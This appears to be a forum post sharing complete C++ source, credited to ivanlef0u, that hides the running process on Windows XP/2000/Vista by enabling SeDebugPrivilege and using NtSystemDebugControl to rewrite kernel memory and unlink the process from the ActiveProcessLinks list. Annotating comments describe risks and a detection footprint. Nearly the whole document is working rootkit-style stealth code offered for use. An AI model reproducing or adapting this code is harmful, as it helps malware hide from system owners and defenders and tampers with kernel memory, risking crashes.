This is not my code at all; I only added/modified two lines so that it compiles and works correctly under Dev-C++: 1) `LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);` 2) `*(DWORD*)&NtSystemDebugControl = (DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");`
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <iostream>
using namespace std;
// Native status code type returned by NtSystemDebugControl; compared against STATUS_SUCCESS below.
typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // zero: the native call reported success
//ivanlef0u's code
//xp sp2 ntoskrnl 5.1.2600, les chiffres indiquent la taille de la struct à passer en argument
// Control classes for NtSystemDebugControl as recorded by the author for the XP SP2 kernel
// (see the note above). The trailing hex comments are the author's record of the size of the
// input structure each class expects. Only DebugSysReadVirtual and DebugSysWriteVirtual are
// used in this file (see HideCurrentProcess).
typedef enum _DEBUG_CONTROL_CODE {
    DebugSysGetTraceInformation=1,
    DebugSysSetInternalBreakpoint, //0x38
    DebugSysSetSpecialCall, //0x4
    DebugSysClerSpecialCalls, // (sic) no arguments; clears all special calls
    DebugSysQuerySpecialCalls,
    DebugSysBreakpointWithStatus,
    DebugSysGetVersion, //0x28
    // Values from here on follow the ReactOS sources (ntexapi.h, by Alex Ionescu).
    DebugSysReadVirtual = 8, //0x10 - input is a SYSDBG_VIRTUAL (see below)
    DebugSysWriteVirtual = 9, // input is a SYSDBG_VIRTUAL (see below)
    DebugSysReadPhysical = 10,
    DebugSysWritePhysical = 11,
    DebugSysReadControlSpace=12, //0x18
    DebugSysWriteControlSpace, //0x18
    DebugSysReadIoSpace, //0x20
    DebugSysSysWriteIoSpace, //0x20
    DebugSysReadMsr, //0x10
    DebugSysWriteMsr, //0x10
    DebugSysReadBusData, //0x18
    DebugSysWriteBusData, //0x18
    DebugSysCheckLowMemory,
} DEBUG_CONTROL_CODE;
// Input block for the DebugSysReadVirtual / DebugSysWriteVirtual control classes, as used in
// HideCurrentProcess: Address is the kernel virtual address to read from or write to, Buffer the
// user-mode buffer that receives or supplies the bytes, Request the number of bytes to transfer.
// (The kernel-side definition is not on this page; field meanings are taken from the usage here.)
typedef struct _SYSDBG_VIRTUAL {
    PVOID Address; // kernel virtual address
    PVOID Buffer;  // user-mode buffer
    ULONG Request; // byte count
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
// Forward declaration of ntdll's RtlNtStatusToDosError (NTSTATUS -> Win32 error code).
// It is declared but never called anywhere in this file.
extern "C"
__declspec(dllimport)
ULONG
__stdcall
RtlNtStatusToDosError(
    NTSTATUS Status
);
// Fixed address of the processor control region (what fs:[0] points to in kernel mode, per the
// author). Hard-coded for the specific 32-bit kernel layouts the author targeted; nothing in this
// file verifies it before HideCurrentProcess uses it as a kernel read address.
#define PKPCR 0xffdff000 // <=> fs:[0] in KeLand
//FUNCTIONS:
// Hand-written prototype for ntdll's NtSystemDebugControl. Declared without an initialiser, so it
// is a null pointer until HideCurrentProcess resolves it with GetProcAddress; the parameter types
// are the author's and are not checked against the real export.
LONG (NTAPI *NtSystemDebugControl)(int,void*,DWORD,void*,DWORD,DWORD*);
//Check OS and get the right Offset:
// xWeasel's check: identify the Windows release and select the offset HideCurrentProcess
// uses for ActiveProcessLinks. Returns 1 and sets Offset for the three known releases
// (XP, 2000, Vista); returns 0 and leaves Offset untouched for anything else. The result
// of GetVersionEx is not checked, exactly as in the original.
int CheckOSVersion( int &Offset )
{
    OSVERSIONINFO info;
    ZeroMemory(&info, sizeof(OSVERSIONINFO));
    info.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&info);

    // Every known release is an NT-family platform; reject the rest up front.
    if (info.dwPlatformId != VER_PLATFORM_WIN32_NT)
    {
        return 0;
    }

    const DWORD major = info.dwMajorVersion;
    const DWORD minor = info.dwMinorVersion;

    if (major == 5 && minor == 1)
    {
        Offset = 0x88; //WinXP
        return 1;
    }
    if (major == 5 && minor == 0)
    {
        Offset = 0xA0; //Win2000
        return 1;
    }
    if (major == 6 && minor == 0)
    {
        Offset = 0xA0; //VISTA
        return 1;
    }
    return 0;
}
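// Enable one named privilege (here "SeDebugPrivilege") on the current process token.
// Returns 1 on success, 0 on any failure. The privilege must already be present in the
// token (merely disabled); this cannot grant a privilege the account does not hold.
ULONG EnablePrivilege(char *Privilege)
{
    HANDLE hToken = NULL;
    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        // Nothing to release: the original jumped to CloseHandle() on an uninitialised HANDLE here.
        return 0;
    }

    ULONG Ret = 1;
    TOKEN_PRIVILEGES TP;
    ZeroMemory(&TP, sizeof(TP));
    if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
    {
        Ret = 0;
    }
    else
    {
        TP.PrivilegeCount = 1;
        TP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // AdjustTokenPrivileges returns TRUE even when it enabled nothing; the documented
        // "privilege not held" signal is a last-error of ERROR_NOT_ALL_ASSIGNED.
        if(!AdjustTokenPrivileges(hToken, FALSE, &TP, 0, NULL, NULL)
           || GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        {
            Ret = 0;
        }
    }

    CloseHandle(hToken);
    return Ret;
}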
// Unlinks the calling process's EPROCESS from the kernel's ActiveProcessLinks list by reading and
// writing kernel memory from user mode through NtSystemDebugControl (DebugSysReadVirtual /
// DebugSysWriteVirtual) - the classic DKOM process-hiding technique. Offset is the
// ActiveProcessLinks offset selected by CheckOSVersion for the running release.
// Returns 1 when every native call returned STATUS_SUCCESS, 0 at the first failure.
//
// Risk: every address below is derived from hard-coded, unvalidated offsets (PKPCR, 0x124, 0x220,
// 0x8C, Offset) for specific 32-bit kernel builds; on a different layout the writes land on arbitrary
// kernel memory, and a failure after the first write leaves the list half-modified - both usually
// end in a crash rather than a clean error.
// Detection: the footprint visible here is SeDebugPrivilege being enabled on the caller's token,
// followed by NtSystemDebugControl calls with the read/write-virtual control classes. The notes at
// the top state the tool was only verified on XP SP2/SP3; later Windows releases are understood to
// no longer expose kernel read/write through this interface without a kernel debugger - confirm
// against the target build.
int HideCurrentProcess( int Offset )
{
    // Resolve the export at run time (the Dev-C++ fix noted at the top: the address is written through
    // a DWORD*, which only fits a 32-bit build). Neither LoadLibrary nor GetProcAddress is checked, so a
    // missing export leaves a null function pointer that the first call below dereferences.
    *(DWORD*)&NtSystemDebugControl =(DWORD)GetProcAddress(LoadLibrary("ntdll"),"NtSystemDebugControl");
    // Kernel addresses are carried as 32-bit ULONGs, consistent with the 32-bit layouts targeted above.
    ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
    SYSDBG_VIRTUAL Mem;
    // NtSystemDebugControl requires SeDebugPrivilege; give up if it cannot be enabled.
    if(!EnablePrivilege("SeDebugPrivilege"))
    {
        return 0;
    }
    /**************** CURRENT ETHREAD ****************/
    // Read the CurrentThread pointer from the fixed processor-control-region address into Addr.
    Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread : Ptr32 _KTHREAD
    Mem.Buffer=&Addr;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    /**************** CURRENT EPROCESS ****************/
    // Follow ETHREAD.ThreadsProcess to the calling process's EPROCESS; Addr now holds that address.
    Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
    Mem.Buffer=&Addr;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    /**************** PREV EPROCESS ****************/
    // Blink of ActiveProcessLinks, read at a fixed 0x8C (0x88 + 4 per the comment): the address of
    // the previous entry's list link, despite the variable's name.
    Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    /**************** NEXT EPROCESS ****************/
    // Flink of ActiveProcessLinks, read at the release-specific Offset: the address of the next
    // entry's list link.
    Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
    // First kernel write: prev.Flink = next. From this point on, an early return leaves the
    // list inconsistent - nothing undoes the write.
    Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&NextEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
    // Second kernel write: next.Blink = prev (Blink follows Flink by 4 bytes in a 32-bit LIST_ENTRY).
    Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
    Mem.Buffer=&PrevEPROCESS;
    Mem.Request=sizeof(ULONG);
    Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
    if(Status!=STATUS_SUCCESS)
    {
        return 0;
    }
    return 1; //SUCCED Stuff is hidden!!
}
//MAIN FUNCTION
// GUI-subsystem entry point: debug message box, OS check, hide attempt, second message box.
// HideCurrentProcess's return value is ignored, so the second message box is shown whether or
// not the hide succeeded. hInstance, hPrevInstance, lpCmdLine and nCmdShow are unused.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG
    int Offset; // only assigned when CheckOSVersion returns 1; never read otherwise
    if ( CheckOSVersion(Offset) == 1)
    {
        HideCurrentProcess(Offset);//OK to hide - result not checked
        MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG
    }
    return 0;
} the original idea was by a bad @ss hacker ivanlef0u http://www.ivanlef0u.tuxfamily.org/ --Currently works under SP3